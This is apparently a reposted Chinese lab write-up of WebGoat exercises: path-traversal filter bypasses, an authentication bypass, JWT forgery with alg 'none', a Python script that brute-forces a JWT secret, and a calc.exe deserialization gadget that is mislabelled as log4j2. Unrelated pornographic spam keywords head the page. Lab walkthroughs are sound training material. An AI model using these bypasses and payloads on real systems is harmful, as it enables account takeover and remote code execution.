国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

安全基礎(chǔ)~web攻防特性2

這篇具有很好參考價值的文章主要介紹了安全基礎(chǔ)~web攻防特性2。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

知識補充

Burpsuite Render在無法預(yù)覽顯示時,可以適當?shù)那謇砭彺?br>win10下輸入文字變成繁體解決

Javaweb安全之webGoat

webgoat靶場搭建

進行web漏洞實驗的Java靶場程序,用來說明web應(yīng)用中存在的安全漏洞。
下載文件(最新版本包含新的漏洞靶場):
https://github.com/WebGoat/WebGoat/releases/
https://github.com/WebGoat/WebGoat/releases/
執(zhí)行命令,開啟靶場:
java -jar webgoat-server-8.0.0.M17.jar [–server.port=8080] [–server.address=localhost]
java -jar webwolf-8.0.0.M17.jar

安全基礎(chǔ)~web攻防特性2,安全學(xué)習(xí),安全
訪問鏈接:http://127.0.0.1:8080/WebGoat,自動跳轉(zhuǎn)login界面,注冊登錄。

其中webgoat用于進行WEB漏洞測試和學(xué)習(xí)的JAVA應(yīng)用程序,webwolf用于模擬攻擊者,其中提供了許多輔助攻擊者的工具
安全基礎(chǔ)~web攻防特性2,安全學(xué)習(xí),安全

參考文章1
參考文章2

闖關(guān)

General

Basics HTTP基礎(chǔ)

  1. 隨便輸入字符串,經(jīng)過服務(wù)器就給你逆序,不過這個輸入框是存在xss的
  2. 就是逆序輸出
  3. 輸入框讓輸入POST或GET命令,輸入魔法數(shù)字,抓包
    安全基礎(chǔ)~web攻防特性2,安全學(xué)習(xí),安全
    注 \color{red}{注} :這個數(shù)字是會變的,需要每次抓包觀察

Proxies HTTP代理

  1. 將參數(shù)輸入進去,進入bp,右鍵change method
    Change the Method to GET
    Add a header ‘x-request-intercepted:true’
    Remove the request body and instead send ‘changeMe’ as a query string parameter and set the value to ‘Requests are tampered easily’ (without the single quotes)
    Then let the request continue through (by hitting the play button).
    安全基礎(chǔ)~web攻防特性2,安全學(xué)習(xí),安全

Developer Tools 開發(fā)者工具

  1. Using the console
    在concle中輸入webgoat.customjs.phoneHome(),將隨機數(shù)粘貼進輸入框
    安全基礎(chǔ)~web攻防特性2,安全學(xué)習(xí),安全
    6.?Working with the Network tab
    在http請求的請求字段中包含一個networkNum字段,將隨機數(shù)復(fù)制上去
    安全基礎(chǔ)~web攻防特性2,安全學(xué)習(xí),安全
    注 \color{red}{注} :想到為什么會在payload中才能看到這串數(shù)字
    前后端聯(lián)調(diào)之Form Data與Request Payload,具體解釋說道:該字段的出現(xiàn)類型主要伴隨著Content-type的出現(xiàn)而出現(xiàn)

Injection

Path traversal 路徑遍歷
攻擊者可以在其中訪問或存儲外部的文件和目錄 應(yīng)用程序的位置
解決問題:部分目錄不允許上傳可執(zhí)行文件,向上級目錄上傳
查看源碼:將jar寶解壓,用idea打開,尋找對應(yīng)的jar,添加道路,對源碼進行查看

  1. 要求上傳到C:\Users\2han/.webgoat-2023.8/PathTraversal位置,經(jīng)過抓包后發(fā)現(xiàn),其上傳位置包含了一個resign,所以要上傳到其上一級目錄。
    安全基礎(chǔ)~web攻防特性2,安全學(xué)習(xí),安全修改目標位置
    @ResponseBody
        public AttackResult uploadFileHandler(@RequestParam("uploadedFile") MultipartFile file, @RequestParam(value = "fullName",required = false) String fullName) {
            return super.execute(file, fullName);
        }
    
    安全基礎(chǔ)~web攻防特性2,安全學(xué)習(xí),安全
    成功過關(guān)
    安全基礎(chǔ)~web攻防特性2,安全學(xué)習(xí),安全
  2. 對上次實驗做了修復(fù),需要相同的結(jié)果,結(jié)果如下
    安全基礎(chǔ)~web攻防特性2,安全學(xué)習(xí),安全
    第一行post到服務(wù)器端POST /WebGoat/PathTraversal/profile-upload-fix HTTP/1.1,查找該文件,進行了單層過濾替代。
    @ResponseBody
    public AttackResult uploadFileHandler(@RequestParam("uploadedFileFix") MultipartFile file, @RequestParam(value = "fullNameFix",required = false) String fullName) {
        return super.execute(file, fullName != null ? fullName.replace("../", "") : "");
    }
    
    雙寫繞過
    安全基礎(chǔ)~web攻防特性2,安全學(xué)習(xí),安全
  3. 一樣是將文件上傳到該位置,getOriginalFilename()得到上傳時的文件名,所以從文件名入手。
    源碼
    @ResponseBody
    public AttackResult uploadFileHandler(@RequestParam("uploadedFileRemoveUserInput") MultipartFile file) {
        return super.execute(file, file.getOriginalFilename());
    }
    
    安全基礎(chǔ)~web攻防特性2,安全學(xué)習(xí),安全
  4. 一樣的,直接看源碼
    如果參數(shù)為null,或者不包含…或/,則進入下面的代碼;
    獲取id,有id則賦值,若沒有id,則生成一個1~10的隨機數(shù)作為id;
    catPicture是id后面加了.jpg;
    若出現(xiàn)path-traversal-secret.jpg參數(shù),返回ok。

安全基礎(chǔ)~web攻防特性2,安全學(xué)習(xí),安全
開始嘗試,當傳入id=1,有返回
安全基礎(chǔ)~web攻防特性2,安全學(xué)習(xí),安全
嘗試查找path-traversal-secret,當有…/時會出現(xiàn)非法字符提示,嘗試使用反斜杠\仍舊無法繞過,使用%2e%2e%2f進行繞過

安全基礎(chǔ)~web攻防特性2,安全學(xué)習(xí),安全
安全基礎(chǔ)~web攻防特性2,安全學(xué)習(xí),安全
安全基礎(chǔ)~web攻防特性2,安全學(xué)習(xí),安全

總結(jié):
目錄遍歷雙寫…/繞過,雙寫繞過;
返回400,說明服務(wù)器后臺并未對目錄遍歷攻擊作任何限制,但是并沒有請求到資源;
GET 請求參數(shù)中不允許存在…與/時,通過 url 編碼繞過,%2e%2e%2f為. ./;
當服務(wù)器只允許獲取當前格式的資源時,使用空白字符繞過,%20,%2a;
當使用post傳參時,僅修改可變參數(shù)。

ldentity & Auth Failure

Authentication Bypasses 身份認證繞過
POST /WebGoat/auth-bypass/verify-account HTTP/1.1
根據(jù)第一行數(shù)據(jù)可查找后臺代碼

身份認證:
認證問題答案,很多選項:
你叫什么名字等等…只有兩個問題(類似原來的qq密保類的東西)

接受鍵名和鍵值
s0=xiaodi&s1=湖北 正確
s3=null&s4=null發(fā)送數(shù)據(jù)
s3 s4為空,相當于NULL,那么就能進行繞過。
安全驗證:
固定接受的數(shù)據(jù):s0 s1判斷你的數(shù)據(jù) 正常
不固定:s0 s1 正常
不固定:s2 s3不在數(shù)據(jù)庫或者變量內(nèi),攻擊者就能測試。
URL觸發(fā)連接,訪問地址:auth-bypass/verify-account

安全基礎(chǔ)~web攻防特性2,安全學(xué)習(xí),安全

JWT tokens

安全基礎(chǔ)~web攻防特性2,安全學(xué)習(xí),安全

由三部分構(gòu)成,以.分隔,出現(xiàn)在cookie上
安全基礎(chǔ)~web攻防特性2,安全學(xué)習(xí),安全

The token is base64 encoded and consists of three parts:

1.header是base64編碼后的頭部信息    
	{'typ': 'JWT','alg': 'HS256'}    
	定義了聲明token類型和簽名算法alg   
2.payload是base編碼的載荷部分,用來包含用戶名,權(quán)限等數(shù)據(jù)    
	iss (issuer):簽發(fā)人       
	sub (subject):主題   
	aud (audience):受眾     
	exp (expiration time):過期時間   
	nbf (Not Before):生效時間,在此之前是無效的     
	iat (Issued At):簽發(fā)時間  
	jti (JWT ID):編號    
	-定義一個payload:{
	"sub": "l3ife",
	"name": "l3ife",
	 "iat": 888888}
	 對其進行base64加密,得到j(luò)wt的第二部分
	eyJzdWIiOiJsM2lmZSIsIm5hbWUiOiJsM2lmZSIsImlhdCI6ODg4ODg4fQ
3.signature,把前兩段的base密文通過﹐拼接起來,然后對其進行HS256加密,再然后對 hs256密文進行base64url加密,最終得到token的第三段。
HS256加密:
signature = HMACSHA256( base64UrlEncode(header) + "." +base64UrlEncode(payload), secret );
   
RS256加密:      
signature = RSASHA256(base64UrlEncode(header) + "." +base64UrlEncode(payload), publicKey, privateKey)

解密平臺:https://jwt.io/

安全基礎(chǔ)~web攻防特性2,安全學(xué)習(xí),安全
用戶在成功對服務(wù)器進行身份驗證時使用用戶名和密碼登錄返回。服務(wù)器創(chuàng)建一個新令牌,并將此令牌返回給客戶端。當客戶端連續(xù)調(diào)用服務(wù)器,它將新令牌附加到“Authorization”標頭中。 服務(wù)器讀取令牌并首先驗證簽名,驗證成功后,服務(wù)器使用令牌中用于標識用戶的信息。

  1. 用戶無法投票,只有成為管理員才可以投票,需要更改令牌成為管理員用戶,成了管理員用戶才可以重置投票
    安全基礎(chǔ)~web攻防特性2,安全學(xué)習(xí),安全
    安全基礎(chǔ)~web攻防特性2,安全學(xué)習(xí),安全
    聲明加密方法為HS512,第二部分聲明用戶名和權(quán)限,可以看到管理員權(quán)限為false
    將admin改為true,由于加密方法是HS512,且不知道秘鑰,所以只能將alg的值改為none,即無加密方法。
    安全基礎(chǔ)~web攻防特性2,安全學(xué)習(xí),安全
    {
    “alg”: “none”
    }
    安全基礎(chǔ)~web攻防特性2,安全學(xué)習(xí),安全
    {
    “iat”: 1706459434,
    “admin”: “true”,
    “user”: “Tom”
    }
    安全基礎(chǔ)~web攻防特性2,安全學(xué)習(xí),安全
    11.? 暴力破解便有可能將密鑰解出。

    token:eyJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJhdWQiOiJ3ZWJnb2F0Lm9yZyIsImlhdCI6MTcwNTYwNDg5NiwiZXhwIjoxNzA1NjA0OTU2LCJzdWIiOiJ0b21Ad2ViZ29hdC5vcmciLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQub3JnIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19.5aqiNb0jY1xvFycagd65E1eN0PsFhbgvhf8lBMXZTio

    安全基礎(chǔ)~web攻防特性2,安全學(xué)習(xí),安全
    暴力破解

    import jwt
    import termcolor
    if __name__ == "__main__":
        jwt_str = R'eyJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJhdWQiOiJ3ZWJnb2F0Lm9yZyIsImlhdCI6MTY0MTg5Njc3MiwiZXhwIjoxNjQxODk2ODMyLCJzdWIiOiJ0b21Ad2ViZ29hdC5vcmciLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQub3JnIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19.ZaBAasksu_uUYloJwpaNwzRhpIaHNSSYxSANfmNZ1Rk'
        with open('top1000.txt') as f:
            for line in f:
                key_ = line.strip()
                try:
                    jwt.decode(jwt_str, algorithms=["HS256"],verify=True, key=key_)
                    print('\r', '\bbingo! found key -->', termcolor.colored(key_, 'green'), '<--')
                    break
                except (jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.ImmatureSignatureError):
                    print('\r', '\bbingo! found key -->', termcolor.colored(key_, 'green'), '<--')
                    break
                except jwt.exceptions.InvalidSignatureError:
                    print('\r', ' ' * 64, '\r\btry', key_, end='', flush=True)
                    continue
            else:
                print('\r', '\bsorry! no key be found.')	# bingo! found key --> victory <--
    

    根據(jù)要求修改username為webgoat;將密鑰填進去;修改一下exp的時間戳,只要比當前時間晚就好。

13.? 之前的日志,找到一種方法去讓tom花錢訂購書,在日志中發(fā)現(xiàn)token
安全基礎(chǔ)~web攻防特性2,安全學(xué)習(xí),安全
抓結(jié)賬的寶,修改jwt,exp為請求過期時間,加密方式使用none

安全基礎(chǔ)~web攻防特性2,安全學(xué)習(xí),安全
參考鏈接
參考文章1
參考文章2

log4j2漏洞利用

<sorted-set>
 <string>foo</string>
 <dynamic-proxy>
 <interface>java.lang.Comparable</interface>
 <handler class="java.beans.EventHandler">
 <target class="java.lang.ProcessBuilder">
 <command>
 <string>calc.exe</string>
 </command>
 </target>
 <action>start</action>
 </handler>
 </dynamic-proxy>
</sorted-set>

JS項目&Node.JS框架安全

JavaScript語言可以通過其網(wǎng)站本身代碼檢查查看,等同于白盒測試
在Javascript中也存在變量和函數(shù),存在可控變量及函數(shù)調(diào)用,即參數(shù)漏洞

判斷是否為js代碼開發(fā)的web應(yīng)用
插件wappalyzer
源代碼簡短
引入多個js文件
一般有/static/js/app.js 等順序的js文件
cookie中有connect.sid

如何獲取更多的JS文件?

JsFinder
Packer-Fuzzer
掃描器后綴替換字典

快速獲取價值代碼?

method:"get"
http.get("
method:"post"
http.post("
$.ajax
service.httppost
service.httpget

參考文章文章來源地址http://www.zghlxwxcb.cn/news/detail-824554.html

到了這里,關(guān)于安全基礎(chǔ)~web攻防特性2的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • 零基礎(chǔ)自學(xué)網(wǎng)絡(luò)安全/網(wǎng)絡(luò)滲透攻防路線學(xué)習(xí)方法【建議收藏】

    零基礎(chǔ)自學(xué)網(wǎng)絡(luò)安全/網(wǎng)絡(luò)滲透攻防路線學(xué)習(xí)方法【建議收藏】

    1.這是一條堅持的道路,三分鐘的熱情可以放棄往下看了. 2.多練多想,不要離開了教程什么都不會了.最好看完教程自己獨立完成技術(shù)方面的開發(fā). 3.有時多google,baidu,我們往往都遇不到好心的大神,誰會無聊天天給你做解答. 4.遇到實在搞不懂的,可以先放放,以后再來解決. 1.web安全方

    2024年02月03日
    瀏覽(18)
  • day31WEB攻防-通用漏洞&文件上傳&js驗證&mime&user.ini&語言特性

    day31WEB攻防-通用漏洞&文件上傳&js驗證&mime&user.ini&語言特性

    目錄 1.JS驗證 2.JS驗證+MIME? 3.JS驗證+.user.ini? 4.JS驗證+.user.ini+短標簽 (ctfshow154,155關(guān)) 5.JS驗證+.user.ini+短標簽+過濾 [ ] 6.JS驗證+.user.ini+短標簽+加過濾+文件頭 有關(guān)文件上傳的知識 1.為什么文件上傳存在漏洞 ? ? ? ?上傳文件時,如果服務(wù)瑞代碼未對客戶端上傳的文件進行嚴

    2024年01月25日
    瀏覽(33)
  • Web安全攻防世界06 easyupload

    Web安全攻防世界06 easyupload

    這道題我掙扎了很久,還是沒有解出來,詳細 錯誤 解題思路可以參考另一篇博文~(#_-) CTF 總結(jié)01:文件上傳繞過_梅頭腦_的博客-CSDN博客 ↑博文很啰嗦地講述了我用蟻劍連接一句話木馬花式寫法的各種失敗姿勢,面對文件上傳一步一個坑的絕望心態(tài),歡迎同伴圍觀、吐槽和指

    2024年02月07日
    瀏覽(19)
  • Web 攻防之業(yè)務(wù)安全:驗證碼繞過測試.

    業(yè)務(wù)安全是指保護業(yè)務(wù)系統(tǒng)免受安全威脅的措施或手段。 廣義 的業(yè)務(wù)安全應(yīng)包括業(yè)務(wù)運行的 軟硬件平臺 (操作系統(tǒng)、數(shù)據(jù)庫,中間件等)、 業(yè)務(wù)系統(tǒng)自身 (軟件或設(shè)備)、 業(yè)務(wù)所提供的服務(wù)安全 ; 狹義 的業(yè)務(wù)安全指 業(yè)務(wù)系統(tǒng)自有的軟件與服務(wù)的安全 。 驗證碼繞過測試

    2023年04月10日
    瀏覽(20)
  • Web 攻防之業(yè)務(wù)安全:輸入 / 輸出模塊測試.

    業(yè)務(wù)安全是指保護業(yè)務(wù)系統(tǒng)免受安全威脅的措施或手段。 廣義 的業(yè)務(wù)安全應(yīng)包括業(yè)務(wù)運行的 軟硬件平臺 (操作系統(tǒng)、數(shù)據(jù)庫,中間件等)、 業(yè)務(wù)系統(tǒng)自身 (軟件或設(shè)備)、 業(yè)務(wù)所提供的服務(wù)安全 ; 狹義 的業(yè)務(wù)安全指 業(yè)務(wù)系統(tǒng)自有的軟件與服務(wù)的安全 。 輸入 / 輸出模塊

    2023年04月24日
    瀏覽(30)
  • Web安全攻防世界05 easyphp(江蘇工匠杯)

    Web安全攻防世界05 easyphp(江蘇工匠杯)

    題目是這個樣子的: 發(fā)現(xiàn)自己編輯的東西有一部分沒有被發(fā)出來,怪不得閱讀量低到可憐...現(xiàn)在重新補上一些內(nèi)容,解題過程很羅嗦,對小白依然友好~ 按照慣例,把源碼貼在這里逐行分析一下~ 解題思路如下: 整個題目就是單純地在考驗php語法,并且每個變量輸錯了都有不同

    2024年02月13日
    瀏覽(17)
  • WEB攻防-Java安全&原生反序列化&SpringBoot攻防&heapdump提取&CVE

    WEB攻防-Java安全&原生反序列化&SpringBoot攻防&heapdump提取&CVE

    知識點: 1、Java安全-原生反序列化-3大類接口函數(shù)利用 2、Java安全-SpringBoot攻防-泄漏安全CVE安全 序列化是將Java對象轉(zhuǎn)換成字節(jié)流的過程。而反序列化是將字節(jié)流轉(zhuǎn)換成Java對象的過程,java序列化的數(shù)據(jù)一般會以標記( ac ed 00 05 )開頭,base64編碼的特征為 rO0AB 。 JAVA常見的序列化

    2024年02月03日
    瀏覽(24)
  • 網(wǎng)絡(luò)安全入門 5 天速成教程_ WEB 安全滲透攻防技術(shù)

    網(wǎng)絡(luò)安全入門 5 天速成教程_ WEB 安全滲透攻防技術(shù)

    前言 隨著 Web 技術(shù)發(fā)展越來越成熟,而非 Web 服務(wù)越來越少的暴露在互聯(lián)網(wǎng)上,現(xiàn)在互聯(lián)網(wǎng)安全主要指的是 Web 安全。 為了自身不“裸奔”在大數(shù)據(jù)里,漸漸開始學(xué)習(xí) Web 安全,在學(xué)習(xí) Web 安全的過程中,發(fā)現(xiàn)很大一部分知識點都相對零散,如果沒有相對清晰 的脈絡(luò)作為參考,

    2024年04月23日
    瀏覽(35)
  • Web 攻防之業(yè)務(wù)安全:驗證碼自動識別 測試.

    Web 攻防之業(yè)務(wù)安全:驗證碼自動識別 測試.

    驗證碼安全 也可以叫《 全自動區(qū)分計算機和人類的圖靈測試 》,是一種 區(qū)分用戶是計算機還是人的共全自動程序。 可以防止:惡意破解密碼、刷票、論壇灌水??梢杂行Х乐购诳蛯δ骋粋€特定用戶用特定程序暴力破解方式進行不斷的登陸嘗試。由于計算機無法解答CAPTCHA的

    2023年04月11日
    瀏覽(27)
  • Web安全攻防世界01 fileinclude(宜興網(wǎng)信辦)

    Web安全攻防世界01 fileinclude(宜興網(wǎng)信辦)

    攻防世界文件包含入門題目,參考大佬們的WP有所補充,內(nèi)容對小白友好~ 按照慣例,首先查看源代碼ctrl+u: 整理一下大概是下面這個意思(代碼0基礎(chǔ),可能有誤,歡迎留言溝通與指正~) 所以題目的關(guān)鍵在于達成這第15行的條件: $lan = $_COOKIE[\\\'language\\\']; 在cookie中的內(nèi)容 lang

    2023年04月08日
    瀏覽(95)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包